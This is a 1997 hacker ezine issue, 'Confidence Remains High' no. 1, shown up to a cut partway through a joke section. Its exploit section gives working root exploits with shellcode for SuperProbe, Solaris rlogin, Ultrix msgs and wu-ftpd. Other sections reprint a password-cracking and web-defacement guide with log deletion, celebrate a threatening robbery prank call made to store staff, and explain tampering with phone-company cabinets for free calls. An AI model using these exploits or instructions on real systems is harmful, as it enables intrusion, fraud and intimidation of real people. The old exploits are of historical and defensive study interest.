crh001.txt100644 1751 12 511652 6355575542 10323 0ustar wheel =============================================================================== =--------------------=====================================--------------------= =--------------------= Status : Confidence Remains High. =--------------------= =--------------------= Issue : 001. =--------------------= =--------------------= Date : April 16th 1997. =--------------------= =--------------------=====================================--------------------= =============================================================================== ==================> http://www.codez.com UP FUCKEN NOW!@# <================== =============================================================================== .:. Site Of The Month .:. -----------------------> http://micros0ft.paranoia.com <----------------------- In This Issue : -----=> Section A : Introduction And Cover Story. 1. Welcome To Issue 1 Of Confidence Remains High......: Tetsu Khan 2. sIn eXposed........................................: The CodeZero + Friends -----=> Section B : Exploits And Code. 1. SuperProbe.........................................: Solar Designer 2. Ultrix Exploit.....................................: StatioN 3. Solaris 2.5 / 2.5.1 rlogin Exploit.................: Jeremy Elson 4. wu-ftpd 2.4(1) Exploit.............................: Eugene Schultz 5. portmsg.c..........................................: Some FTP Someplace.. -----=> Section C : Phones / Scanning / Radio. 1. Fast Food Restuarant Frequencies...................: Dj Gizmo 2. Robbing Stores With Phones, A Real Example.........: The CrackHouse 3. How To Rewire Your House For Free Phone Calls......: WildFire -----=> Section D : Miscellaneous. 1. Hacking Electrical Items Part 2, The Sequel........: Tetsu Khan 2. Virus Definitions..................................: so1o 3. Fun With whois, sinnerz.com........................: so1o 4. Hacking Space Shuttles, Abort Codes................: NailGun 5. Country Domain Listing.............................: SirLance -----=> Section E : World News. 1. CoreWars...........................................: so1o / odphreak 2. Technophoria Want A Piece Of CodeZero Too?.........: so1o 3. Global kOS Press Release...........................: Spidey 4. www.ncaa.com Hack Makes News.......................: so1o 5. CodeZero To Release sunOS 5.x RootKit..............: so1o 6. Too Many nethosting.com Break-Ins..................: so1o 7. sulfur of #hack to print a bi-monthly magazine.....: so1o 8. 2600 Printers go bust and take $9000 with them.....: so1o ------=> Section F : Projects. 1. IP Spoofing Programs And Utilities.................: Dr_Sp00f 2. Using LinuxRootKitIII..............................: suid -----=> Section G : The End. =============================================================================== ==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]== =============================================================================== 1. Welcome To Issue 1 Of Confidence Remains High : Tetsu Khan Confidence Remains High will be issued EVERY 50 DAYS as from April 16th... It is free, not like 2600, or sulfur's soon to be released Access Denied, which both cost *YOU*, the reader MONEY, cash, $$$ etc. which we don't like, because information should be free, and so, we bring you Confidence Remains High, with news, exploits, scanning, telco, and enough shit to make you wonder "why did I ever pay cash for this?!" anyway, on with the show... ==================> http://www.codez.com UP FUCKEN NOW!@# <================== ==================> http://www.codez.com UP FUCKEN NOW!@# <================== ==================> http://www.codez.com UP FUCKEN NOW!@# <================== Confidence Remains High is issued every 50 days as from April 16th, as then, issue 20 will be released on New Years Day 2000 (if we go that far!) Tetsu Khan. 2. sIn eXposed : CodeZero + Friends. If you cant be bothered to read all this shit, just go to... ---------------> www.sinnerz.com/bible.htm <--------------- ...And view the lameness for yourself :) ------------------------------------------------------------------------------- Concerning the news in issue 2 of the CodeZero technical journal, we found this response (http://www.sinnerz.com/codezero.txt) : So has anyone here heard of Codezero? Its some ezine type shit that i just wanted to expose as bullshit. I had never heard of it till i talked to darkfool and he showed me... You can check it out at neonunix.org/codezero. It is pretty good for a laugh. When me and Banshee and Messiah first read it we all were in #sin and the first thing to come to our mind was.. wtf is this? Some hacker gossip column or what? Even more funny was the surprise i got when i saw that the editor was Tetsu Khan (so1o who was mentioned earlier in the Bible)... that brought a smile to my face to see that. Anyways so i was reading thru issue 2 of codezero and i happend to see a lot of bogus information...stuff said that wasn't true. Same with the first issue. Examples our comments like "Infected has some new programs coming out soon including Utopia an encryption program by The Messiah." Anyways im doing the algorithm for that program with Messiah and it is not going to be out for a long time... Messiah has a lot of plans for the future all coming before Utopia does.... Those are the exact, untouched words of HosTie of SiN, hmmm, lets examine that passage more closely... "some ezine type shit that i just wanted to expose as bullshit..." "i was reading thru issue 2 of codezero and i happend to see a lot of bogus information...stuff said that wasn't true..." This is very interesting indeed, that they should care about a small news section in the journal isn't it? seeing that we published how many lines about them? a whole 20 I hear you say? hmm...doesn't the journal have exploits and other stuff in it to? I think it does... "Anyways im doing the algorithm for that program with Messiah and it is not going to be out for a long time... Messiah has a lot of plans for the future all coming before Utopia does...." So then HoStie, you can program now? thats new, and *YOU* are coding the algorithm? intersting... WAIT! you are saying that Utopia is true? and that we did publish correct information? I always thought so, seeing that the truth is that you probably wanted your beautiful new program to be a big surpise to the "scene"... Heh, how silly of me to actually think you had a clue! You just can't take it that you are stuck in a lame fuck group of wannabes and the truth is finally coming out...Let us examine more examples found on www.sinnerz.com : It also had some shit like "4 new hacks were reported this month" and they were right on the 4 new hacks part but they put bogus shit about them. The catch22 one they happend to put the html for it.. well they put the wrong shit that was on it. Becuz on the catch22 hack Darkfool had put the names of all the SIN members on the page. Which they decided to leave out... also They put some weird shit which they said was on the 2 hacks Darkfool did. Where it was the entersin.gif from our page that was there with a bunch of other links. Anyways there is also a lot of other shit that was bullshit in both of their issues... SHoCk HoRRoR !!!! Darkfool was responsible for the www.catch22.com hack ?? and SiN was linked to the hacks too?? That is interesting news HoSTie, seeing you just could have landed one of your SiN members in trouble, as CodeZero didn't mention any names concerning the catch22.com hack, and the very first index.html to go up, which was the one we published was infact very correct, its just that the index.html must have changed how many times that day? hmmm... "...wrong shit that was on it. Becuz on the catch22 hack Darkfool had put the names of all the SIN members on the page. Which they decided to leave out..." Strange...seeing another hacker, by the name of Sventa, was blamed entirely for the attacks. Oh yeah, one last thing, in the index.html that was apparently modified by Darkfool of SiN, there were 8 numbers, we know what they stand for, SiN doesn't, all will be explained one day, as SiN are cl00less and need a good kicking. Let us continue, with a "hacking guide" taken from www.sinnerz.com : -------------------------------------------------------------------- _________ ___ _______ \~=._ _.=~/ / _____/ | | \ \ \~=._ _.=~/ \ ~=__=~ / \_____ \ | | / | \ \ ~=__=~ / \_.=~ ~=._/ / \ | |/ | \ \_.=~ ~=._/ _.=~ \ / ~=._ /_______ / |___|\____|__ / .=~ \ / ~=. L------\------/------7 \/ \/ L------\------/------7 \ / \ / \ / http://www.sinnerz.com \ / \/ \/ OK, this is my mini guide to the easiest 'hacking' there is ( I think ) if any one knows different then mail me and tell me :) . Most FTP servers have the directory /pub which stores all the 'public' information for you to download. But along side /pub you will probably find other directorys such as /bin and /etc its the /etc directory which is important. In this directory there is normally a file called passwd. . This looks something like this :- root:7GHgfHgfhG:1127:20:Superuser jgibson:7fOsTXF2pA1W2:1128:20:Jim Gibson,,,,,,,:/usr/people/jgibson:/bin/csh tvr:EUyd5XAAtv2dA:1129:20:Tovar:/usr/people/tvr:/bin/csh mcn:t3e.QVzvUC1T.:1130:20:Greatbear,,,,,,,:/usr/people/mcn:/bin/csh mouse:EUyd5XAAtv2dA:1131:20:Melissa P.:/usr/people/mouse:/bin/csh This is where all the user names and passwords are kept. For example, root is the superuser and the rest are normal users on the site. The bit after the word root or mcn such as in this example (EUyd5XAAtv2dA) is the password BUT it is encrypted. So you use a password cracker....which you can d/l from numerous sites which I will give some URL's to at the end of this document. With these password crackers you will be asked to supply a passwd. file which you download from the \etc directory of the FTP server and a dictionary file which the crackers progam will go through and try to see if it can make any match. And as many people use simple passwords you can use a 'normal' dictionary file. But when ppl REALLY don't want you to break their machines they set their passwords to things such as GHTiCk45 which Random Word Generator will create (eventually ). Which is where programs such as Random Word Generator come in. ( Sorry just pluging my software ) BTW the bad news is that new sites NORMALLY have password files which look like this :- root:x:0:1:0000-Admin(0000):/:/sbin/sh The x signifies shadowed - you can't use a cracker to crack it because there's nothing there to crack, its hidden somewhere else that you can't get to. x is also represented as a * or sometimes a . Ones like the top example are known as un-shadowed password files normally found at places with .org domain or .net and prehaps even .edu sites. (Also cough .nasa.gov cough sites). If you want a normal dictionary file i recommend you go to http://www.globalkos.org and download kOS Krack which has a 3 MEG dictionary file. Then run a .passwd cracking program such as jack the ripper or hades or killer crack ( I recommend ) against the .passwd file and dictionary file. Depending upon the amount of passwords in the .passwd file, the size of the dictionary file and the speed of the processor it could be a lengthy process. Eventually once you have cracked a password you need a basic knowledge of unix. I have included the necassary commands to upload a different index.html file to a server :- Connect to a server through ftp prefably going through a few shells to hide your host and login using the hacked account at the Login: Password: part. Then once connected type dir or list If there's a directory called public_html@ or something similar change directory using the Simple dos cd command ( cd public_html ) Then type binary to set the mode to binary transfer ( so you can send images if necassary ) Then type put index.html or whatever the index file is called. It will then ask which transfer you wish to use, Z-Modem is the best. Select the file at your end you wish to upload and send it. Thats it ! If you have root delete any log files too. Please note that this process varys machine to machine. To change the password file for the account ( very mean ) login in through telnet and simply type passwd at the prompt and set the password for the account to anything you wish. Thats it....if ya don't understand it read it about 10x if ya still don't ask someone else i am too busy with errrr stuff.. Links :- http://www.sinnerz.com Where you got this I hope. Stay cool and be somebodys fool everyone Darkfool darkfool@pancreas.com http://www.sinnerz.com --- Ummm, *NEWS FLASH*, lets see shall we, this tells attackers to retrieve the passwd file using what?! FTP I hear you scream? well, lets see shall we children, gather 'round... "Most FTP servers have the directory /pub which stores all the 'public' information for you to download. But along side /pub you will probably find other directorys such as /bin and /etc its the /etc directory which is important. In this directory there is normally a file called passwd. . This looks something like this :-" Oh dear, oh dear, oh dear, lets look at the FACTS : Common FTP passwd path : /home/ftp/etc/passwd *REAL* passwd path : /etc/passwd Hmm, lets see, anyone with a clue would know that the FTP passwd file is not real, it is only there to mislead little wannabes, examples iclude members of SiN. We continue... "Eventually once you have cracked a password you need a basic knowledge of unix. I have included the necassary commands to upload a different index.html file to a server :- Connect to a server through ftp prefably going through a few shells to hide your host and login using the hacked account at the Login: Password: part. Then once connected type dir or list If there's a directory called public_html@ or something similar change directory using the Simple dos cd command ( cd public_html ) Then type binary to set the mode to binary transfer ( so you can send images if necassary ) Then type put index.html or whatever the index file is called. It will then ask which transfer you wish to use, Z-Modem is the best. Select the file at your end you wish to upload and send it. Thats it !" Okay, so now, SiN defines hacking as downloading the /home/ftp/etc/passwd which is a decoy, and then proceed to get kOS Krack (last time I checked www.globalkos.org was down) and then try to crack the passwd file and finally use FTP to upload an index.html? how imaginative and original, pity all of this info you have been fed is absolute crap, with a success rate of practically zero. One last thing... "If you have root delete any log files too." Umm, but you havent told all our wannabe hackers that read your shit where the log files are found, seeing that you have to find them, delete them, then touch them, oh yeah, I thought you were using FTP? strange... Im sure that from these examples we have fowarded to you we have started to prove the truth behind SiN, seeing they are actually quite lame wannabes with very minimal skills...this has been shown, and we will continue to add to this hall of shame for SiN, as until now, no-one has stood up to them, but now it is time for a change. Watch this space my friends, Until next time... T_K I wish I was in sIn, I dew I dew! I dew!! sIn is 3r33t!! -- so1o =============================================================================== ==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]== =============================================================================== 1. SuperProbe : Solar Designer /* * SuperProbe buffer overflow exploit for Linux, tested on Slackware 3.1 * by Solar Designer 1997. */ #include #include #include char *shellcode = "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1" "\xff\xd4\x31\xc0\x8d\x51\x04\x89\xcf\x89\x02\xb0\x2e\x40\xfc\xae\x75\xfd" "\x89\x39\x89\xfb\x40\xae\x75\xfd\x88\x67\xff\xb0\x0b\xcd\x80\x31\xc0\x40" "\x31\xdb\xcd\x80/" "/bin/sh" "0"; char *get_sp() { asm("movl %esp,%eax"); } #define bufsize 8192 #define alignment 0 char buffer[bufsize]; main() { int i; for (i = 0; i < bufsize / 2; i += 4) *(char **)&buffer[i] = get_sp() - 2048; memset(&buffer[bufsize / 2], 0x90, bufsize / 2); strcpy(&buffer[bufsize - 256], shellcode); setenv("SHELLCODE", buffer, 1); memset(buffer, 'x', 72); *(char **)&buffer[72] = get_sp() - 6144 - alignment; buffer[76] = 0; execl("/usr/X11/bin/SuperProbe", "SuperProbe", "-nopr", buffer, NULL); } 2. Ultrix Exploit : StatioN This bug has been fixed in OSF, but not in Ultrix. It should also work on any system that has the msgs mail alias. $ grep msgs /etc/aliases msgs: "|/usr/ucb/msgs -s" Ok, the first thing to do is look in the /usr/msgs directory (or whatever the directory is where the msgs files are kept), and see what the next msgs file will be (if there is 1 and 2, then the next one is pretty easy to figure out). Then, make an executable /tmp/a that like makes a suid shell (this is pretty easy to do, if you can't do it, don't consider yourself a hacker). By default, newsyslog executes every 6 days at 4 am, but it depends on the setup in crontab. What it does is age the syslog file (at /usr/adm/syslog.1, .2, ..., i think). symlink /usr/msgs/ -> /usr/adm/newsyslog $ telnet telnet> o localhost 25 mail shit, version, etc expn msgs 250 <"| /usr/ucb/msgs -s"> mail from: <`/tmp/a`> rcpt to: msgs data doesn't matter what you put here . quit So now, when it writes to /usr/msgs/, it will overwrite /usr/adm/newsyslog, and since /usr/adm/newsyslog is a shell script, it will expand `/tmp/a` by executing /tmp/a AS ROOT, giving you an suid shell or whatever /tmp/a does. From there, just clean up after yourself. StatioN 3. Solaris 2.5 / 2.5.1 rlogin Exploit : Jeremy Elson /* * rlogin-exploit.c: gets a root shell on most Solaris 2.5/2.5.1 machines * by exploiting the gethostbyname() overflow in rlogin. * * gcc -o rlogin-exploit rlogin-exploit.c * * Jeremy Elson, * jeremy.elson@nih.gov */ #include #include #include #include #define BUF_LENGTH 8200 #define EXTRA 100 #define STACK_OFFSET 4000 #define SPARC_NOP 0xa61cc013 u_char sparc_shellcode[] = "\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13" "\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e" "\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a" "\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" "\x82\x10\x20\x3b\x91\xd4\xff\xff"; u_long get_sp(void) { __asm__("mov %sp,%i0 \n"); } void main(int argc, char *argv[]) { char buf[BUF_LENGTH + EXTRA]; long targ_addr; u_long *long_p; u_char *char_p; int i, code_length = strlen(sparc_shellcode); long_p = (u_long *) buf; for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = SPARC_NOP; char_p = (u_char *) long_p; for (i = 0; i < code_length; i++) *char_p++ = sparc_shellcode[i]; long_p = (u_long *) char_p; targ_addr = get_sp() - STACK_OFFSET; for (i = 0; i < EXTRA / sizeof(u_long); i++) *long_p++ = targ_addr; printf("Jumping to address 0x%lx\n", targ_addr); execl("/usr/bin/rlogin", "rlogin", buf, (char *) 0); perror("execl failed"); } 4. wu-ftpd 2.4(1) Exploit : Eugene Schultz This sploit is a teeny bit outdated, but I have been asked by many people about exploiting FTP recently... This shows you how to use the wuftp2.4(1) hole to gain root. ------------------------------------------------------------ On the VICTIM system, compile the following C code: --------------------------------------------------- main() { setuid(0); seteuid(0); system("cp /bin/sh /tmp/suidroot"); system("chmod a+rwxs /tmp/suidroot"); } Now create a shell script, called root.sh, that contains the following: ----------------------------------------------------------------------- exec a.out <----- a.out is the name of the compiled C code Now, FTP localhost, login as your account on that system and: ------------------------------------------------------------- ftp> quote site exec sh root.sh Then quit FTP and execute /tmp/suidroot to become root! 5. portmsg.c : Some FTP Someplace.. /**************************************************************************/ /* portmsg - generate a message on a port, then close connection */ /* */ /* Usage: portmsg file port */ /* */ /* When a telnet client connects to the specified port, the */ /* text from the file will be echoed to the user. After a */ /* short delay the connection will close. */ /* */ /* eg. portmsg /etc/passwd 666 */ /* */ /***************************************************************************/ #include #include #include #include #include #include #include #include #include #include #include wait_on_child() { union wait status; while (wait3(&status, WNOHANG, (struct rusage *) 0) > 0) ; } lostconn() { exit(1); } main(argc, argv) int argc; char *argv[]; { int msgfd, fd, n; struct stat statBuf; int port; char *msg; int sockfd, newsockfd; int addrlen; int opt; struct sockaddr_in tcp_srv_addr; struct sockaddr_in their_addr; if (argc != 3) { fprintf(stderr, "Usage: portmsg file port\n"); exit(1); } port = atoi(argv[2]); if (port == 0) { fprintf(stderr, "error: bad port number [%s]\n", argv[2]); exit(1); } if ((msgfd = open(argv[1], O_RDONLY)) < 0) { fprintf(stderr, "error: cannot open message file [%s]\n", argv[1]); exit(1); } /* read the message */ fstat(msgfd, &statBuf); if (statBuf.st_size <= 0) { fprintf(stderr, "error: message file [%s] is empty\n", argv[1]); exit(1); } msg = (char *)malloc(statBuf.st_size); if (read(msgfd, msg, statBuf.st_size) != statBuf.st_size) { fprintf(stderr, "error: cannot read message file [%s]\n", argv[1]); exit(1); } /* become a daemon */ switch(fork()) { case -1: fprintf(stderr, "error: can't fork\n"); exit(1); case 0: break; default: exit(0); } if (setpgrp(0, getpid()) == -1) { fprintf(stderr, "error: can't change process group\n"); exit(1); } if ((fd = open("/dev/tty", O_RDWR)) >= 0) { ioctl(fd, TIOCNOTTY, NULL); close(fd); } (void)signal(SIGCLD, wait_on_child); bzero((char *) &tcp_srv_addr, sizeof(tcp_srv_addr)); tcp_srv_addr.sin_family = AF_INET; tcp_srv_addr.sin_addr.s_addr = htonl(INADDR_ANY); tcp_srv_addr.sin_port = htons(port); if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { fprintf(stderr, "can't create stream socket\n"); exit(-1); } opt = 1; if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, (char *) &opt, sizeof(opt)) < 0) { perror("setsockopt"); exit(1); } if (bind(sockfd, (struct sockaddr *)&tcp_srv_addr, sizeof(tcp_srv_addr)) < 0) { fprintf(stderr, "can't bind local address\n"); exit(-1); } listen(sockfd, 5); main_again: addrlen = sizeof (their_addr); newsockfd = accept(sockfd, (struct sockaddr *) &their_addr, &addrlen); if (newsockfd < 0) { if (errno == EINTR) goto main_again; fprintf(stderr, "accept error\n"); exit(-1); } switch(fork()) { case -1: fprintf(stderr, "server can't fork\n"); exit(-1); case 0: dup2(newsockfd, 0); dup2(newsockfd, 1); for (n = 3; n < NOFILE; n++) close(n); break; default: close(newsockfd); goto main_again; } /* daemon child arrives here */ (void)signal(SIGPIPE, lostconn); (void)signal(SIGCHLD, SIG_IGN); fprintf(stdout, msg); (void)fflush(stdout); sleep(5); exit(0); } =============================================================================== ==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]== =============================================================================== 1. Fast Food Restuarant Frequencies : Dj Gizmo If you got a scanner and or transciever that works with these frequencies, then you could have some serious phun... ------------------------------------------------------------------------------- RESTAURANT CUSTOMER (R) CLERK (I) LOCATION ------------------------------------------------------------------------------- Arby's 30.8400 154.5700 Nationwide Bess Eaton Donut 457.5375 467.7625 Rhode Island Big Boy 30.8400 154.5700 UNKNOWN OH area 457.6000 467.8250 UNKNOWN OH area Burger King 30.8400 154.5700 UNKNOWN OH area 31.0000 170.3050 UNKNOWN GA area 33.4000 154.5400 Frederick, MD 457.5500 467.7750 Baltimore, MD area 457.5625 467.7875 Nationwide 457.5750 467.8000 UNKNOWN area 457.6000 467.8250 UNKNOWN area 460.8875 465.8875 Nationwide 461.5375 UNKNOWN UNKNOWN OH area Burgerville 30.8400 154.5700 UNKNOWN OH area Dairy Queen 30.8400 154.5700 UNKNOWN OH area 460.8875 465.8875 UNKNOWN OH area 920.2625 WFM UNKNOWN Halifax, Nova Scotia Dunkin Donuts 30.8400 154.5700 UNKNOWN NH area 33.1600 154.5150 UNKNOWN NH area 33.4000 154.5400 UNKNOWN NH area El Mexicano 464.9625 469.9625 Germantown, MD G.D. Ritzy's 35.1000 UNKNOWN UNKNOWN OH area Hardee's 30.8400 154.5700 Nationwide 31.0000 170.3050 UNKNOWN NC area 457.5375 467.7625 UNKNOWN OH area 460.8875 465.8875 UNKNOWN OH area 461.0875 466.0875 UNKNOWN OH area 461.1125 466.1125 Aurora, IL area Jack in the Box 33.4000 154.5400 San Jose, CA Kenny Rogers Roasters 469.0125 464.0125 Frederick, MD Chicken Kentucky Fried Chicken 30.8400 154.5700 Occoquan, VA area 31.0000 170.3050 UNKNOWN MN area 33.1400 151.8950 UNKNOWN OH area 35.0200 154.6000 Frederick, MD 457.5875 467.8125 Vienna, VA area 457.6000 467.8250 UNKNOWN OH area 460.8875 465.8875 Washington, DC area 462.7625 467.8875 Washington, DC area McDonald's CANADA 30.8400 151.6700 main freq. Canada 30.8400 154.1450 aux. freq. Canada McDonald's U.S.A. 30.8400 154.5700 San Diego, CA area 31.0000 170.3050 UNKNOWN OH/NC area 33.1400 151.8950 Nationwide 33.1400 170.3050 Southfield, MI area 33.4000 154.5400 Frederick, MD 33.4000 154.5700 UNKNOWN area ** 35.0200 151.8950 UNKNOWN area ** 35.0200 154.4900 Decatur, IN area 35.0200 154.6000 Nationwide 151.7150 169.4450 Washington, DC area 151.7450 UNKNOWN UNKNOWN OH area 151.7750 171.9050 UNKNOWN OH area 154.5700 170.2450 Nationwide 154.6000 171.1050 Nationwide 155.0000 UNKNOWN UNKNOWN OH area 457.5375 461.0875 UNKNOWN OH area 457.5500 467.7750 UNKNOWN OH area 457.6000 467.8250 UNKNOWN OH area 460.8875 465.8875 UNKNOWN OH area 461.0375 466.0375 UNKNOWN OK/CA area 461.0875 466.0875 UNKNOWN OH area 462.1625 467.1625 UNKNOWN OH area 463.2875 468.2875 UNKNOWN NY area 464.5125 UNKNOWN UNKNOWN OH area 469.0125 464.0125 Germantown, MD 469.1875 464.1875 Frederick, MD 920.5000 WFM 903.5000 WFM Gaithersburg, MD Rally's 457.5375 468.3875 UNKNOWN OH area 461.0875 466.0875 UNKNOWN OH area 461.5375 462.1625 Holland OH area Roy Rogers 30.8400 154.5700 Germantown, MD 457.5375 467.7625 Washington, DC area 469.0125 464.0125 Germantown, MD 469.9250 464.9250 Vienna, VA Taco Bell 30.8400 154.5700 Washington, DC area 33.1600 154.5150 Frederick, MD 33.4000 154.5400 Germantown, MD 460.8875 465.8875 Nationwide 461.0875 466.0875 UNKNOWN OH area 461.5375 UNKNOWN UNKNOWN OH area 464.9625 469.9625 UNKNOWN OH area 469.0125 464.0125 Reston, VA Wendy's 33.4000 154.5400 Rockville, MD 49.8300 49.8900 UNKNOWN area ** 457.5125 467.7375 UNKNOWN OH area 457.5375 467.7625 UNKNOWN OH area 457.6125 467.8375 Washington, DC area 460.8875 465.8875 Nationwide 461.0875 466.0875 UNKNOWN OH area 461.8125 UNKNOWN UNKNOWN OH area 464.3750 UNKNOWN Headquarters 464.5125 UNKNOWN Columbus, OH area White Castle 457.6000 467.8250 UNKNOWN OH area 461.8125 UNKNOWN Columbus, OH area - Have Phun! 2. Robbing Stores With Phones, A Real Example : The CrackHouse the following is a transcript of a teleconference robbery of a Wawa convience store, all names remain the same to fully implicate the guilty. the sad thing is this is an actual transcript. dk: Hello, listen very carefully I'm not going to repeat myself. manager: Who is this? dk: Don't worry about that, listen carefully, don't interrupt. Are you the manager and if so what is your name? manager: yes, i'm the manager, my names kathy. dk:ok kathy, look across the street do you see the apartment complex directly opposite you? manager: yes. dk: i have a man stationed in a car in that complex's parking lot. he has a high powerd assault rifle aimed at the individual behind the counter. i have another man stationed adjacent to the Wawa with a cellular phone. what's the individual's name behind the cash register? manager: her names Lori, please don't hurt anyone. dk: no ones going to get hurt as long as you shut the fuck up and do exactly as i say. instruct lori that she is to keep her hands on the counter at all times, with her palms laid out flat. shes only to move when she must make change for a customer, do not alert any customers in the store kathy. do you understand me? manager: yes i understand, hold on. (kathy then instructs lori) please promise you won't hurt anyone? please. dk: no ones getting hurt, now we got 30 seconds kathy from when i say go, when i say go you grab a plastic bag, fill it with all the money in the register furthest from the doorway and open the back door and leave all the money there, then shut and lock the door. manager: ok ok, do you want the foodstamps? dk: no! the foodstamps go in a seperate bag. sulfur: and get me a gatorade. manager: a gatorade? what kind? sulfur: if it's not a large im gonna open fire. manager: ok just please don't hurt anyone. dk: ok kathy, go! (theres a rustling of bags and some background noise) manager: ok, done, now what? dk: kathy have you made any attempt to contact any form of law enforcement? manager: no i promise. sulfur: she's lying. dk: kathy, do you know what a digital voice analyzer is? (dk is now completely talking out his ass) manager: no. dk: well we have one connected to a polygraph examiner and its telling us your lying kathy. manager: i swear to you im not lying! sulfur: shoot her dk: kathy your lying. manager: no no im not! dk: your lying kathy, mike, open fire open fire! z: open fire!! manager: LORI!! DUCK!! *click* everyone on the conference call: BAHAHAHAHAHAHAHAHAHA 3. How To Rewire Your House For Free Phone Calls : WildFire (-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-) How To Rewire You House For Free Fone Calls In The U.K (-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-) By WildFire of AWOL The aim is to teach you how to rewire your house to an engineer test line for free Fone calls, you dont need any little coloured boxes etc, all you need is a bit of patience and a lot of guts =) EQUIPMENT -: A B.T line into your house Socket wrench with 1/2 inch bit Offical looking enginner clothing (lumi jacket) C.B radios (Optional) STEP 1: We need to find out some information about the your line (Note : these numbers are not anything to do with your Fone number) what we need to know is how it runs back to B.T Eg. The pole outside your house is the first contact then it runs underground to A big green box, these are called DP's (Disconection/Connection points) Fig 1. House -----> Pole ------> Green box ------> B.T \/ \/ Prefix = 46 95 The way to find this out is by sabotaging your house's fone line to get an engininer to pay you a visit . With him he should bring a nice filo-fax with all his jobs in (all the places he's got to visit and their line info etc.) You now Have 3 options (i) KILL HIM!! and steal all his neat stuff * (ii) Act Intrested in his work and ask how he knows which line is yours say you want to do work experience in B.T etc/etc and he might show it to you and even explain it to you. (iii) Sabotage your line in such a way he's got to go up your pole , while he's trying to work out what the fuck you've done have a look at the filo-fax and write down all your info. * Not Recommended There are probally other ways to get your info ie. Bullshiting the B.T depot. or operators but they are not known my me , if anyone has any ideas i'd like to hear from them... STEP 2 : Decode When you have the filo-fax in your hands flick through it, near the end should be a page with your surname and telephone number.. below this should be the following .......... PCP E P DP PR 15 15 360 1922 4 What we are concerned with are the DP, PCP and P DP -- This is the pole, you can check this by going outside and looking at it . PCP/E -- This is the big green box have a look around your neighbourhood not to be confused with cable green boxes !!. P -- This is where your wire-pair are in the green box. The other letters are probally what contact your wire-pair is on the pole etc. Now You're Set To Go On An Adventure .. Wait until darkness falls , Put on your funky glow in the dark jackets, put the socket wrench in your pocket and take a visit to your local greener. Look around for nosey OAP's or other paranoid people. I actually had the shit kicked out of me by a large bloke who thought I was breaking into his house because I was looking very suspect walking around the streets stopping at the end of his road near the green box, ouch! On the front of the box there should be 2 diamond shaped things, pull out the wrench and undo them , the box should now open with ease.. You Should see loads of wires going all over the place. On the back of the left door there should be a white box (like you the one you plug your fone into back home) this is what the Enginerer uses for calls this is what we are going to swap with your house pair . How To Find Your Pair: There should be transparent plastic struts going from top to bottom, they have holes (where the wires come through) with very tiny numbers near them. The Struts are divided up into hundreds , So if your "P" was 360 you go along to the third strut and down until you find the tiny number 60 next to a hole. (see fig 1.18291739)In this hole should be some wire's, with luck they should be yours. Pull the wires out of the white-box and reconnect it to the wire pair going to your house. (the use of radios for checking might be a good idea) Fig 1.18291739 100-200 200-300 300-400 400-500 500-600 600-700 700-800 800-900 -360 Go Home And See if You Have A Dial Tone . Congratulations.... Your house is now ready for free calls .. Dial 175 and get your new fone Number Your old line will be in limbo so you might as well stop paying line rental, so tell B.T to disconnect it. Notes for use: If You're Leaving the dodgy line permanent then make sure you hide the wires well.. If you are going to get your old line cut-off then make sure all your wiring is back as it was before. Don't tell Stupid People your number. Don't call Operators etc. When we used this method we only connected the dodgy line when we needed it, so I don't know what will happen if left on a permenent basis ???!"* The information in this file came from alot of Trial & Error so some facts may be incorrect.. (Anyway it worked for us!). ----------- WildFire ----------- ----------- AWOL '97 ----------- =============================================================================== ==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]== =============================================================================== 1. Hacking Electrical Items Part 2, The Sequel : Tetsu Khan LAst TiME wE WuZ Hax0Rin' ToAsTAz, So foR Dis TiMe i BeeN ThINkin On WhUT wE ShOUld hAx0R, aNd I ThOUghT, "eYe WiLL WrItE AbOuT....BOiLAhS!!! YeS, ThOsE boILaHs yEw FiNd In yOuR BaSEmEnt!!" AnD So I StArTed To pLaY ArouND WifF Muh BoiLAh AT h0me, NoW Yew caN REwt YoUr BoILah Tew!!! FiNDiNg OuT dA OS ThaT ThA BoiLaH iZ RuNNiN' -------------------------------------------- yEw Can DeW ThIS 3 WayZ... 1: LeWk FoR a StIcKA On It DaT Sez. 2: FiNd A CoNsOle On DA BoiLAh, ThEn, If IT hAs A kEYbOArd (DepEndZ oN MaNuFAcTuReR) tYpE "uname -a" AnD It WiLL Tell YeW! 3: FiNd Da ManUaL FoR YouR BOilaH (easiest way) WhEn YoU KnOw YoUr BoILaHs oPeRATinG SyStEm, yEw cAN PRocEEd To Hax0R It... --------------------------------------------------------------------------- Hax0RinG a BoILaH KaN BeE VeRy DangERous, LiKE Hax0Rin' A nuKelear PoWaHH sTAtIon, So MaKe sHuRe YeW dO ThE fOLLowiNG... 1: PuT oN PrOtECtivE CloThInG, LikE GloVeS, AnD a hAT, aNd MaYBe a sCarF, tHis Is BeCoS BaSEmEnts CaN bE CooOLD, aNd YEw WouLDnt WanT To CaTch A ChiLL wOULd YeW? 2: MaKE ShURe YeW HaVE A SpAnnEr Or WreNCH, As YoU WiLL NeEd ThEsE tO FiNd hIdDEn pOrTz AnD TeW Eye-PeE SpoOF fRom TruSteD HoStS (liKe a SinK, oR A pIpE, Or A WaSHing MaChInE) LiKE WiV ToAsTeRz, We wILL fiRsT nEeD tO FiNd HiDDeN PoRtS, So wE NeEd To ScAn FoR tHem, bOilAhz ArE BiGGer tHan tOASterz, sO ThiS MaY tAke SoMe TiMe. YeW cAn LeWk FoR SucH HiDDen PoRtS bY dOIng ThEsE tHinGs... 1: LeWKiNg ArOunD ThE 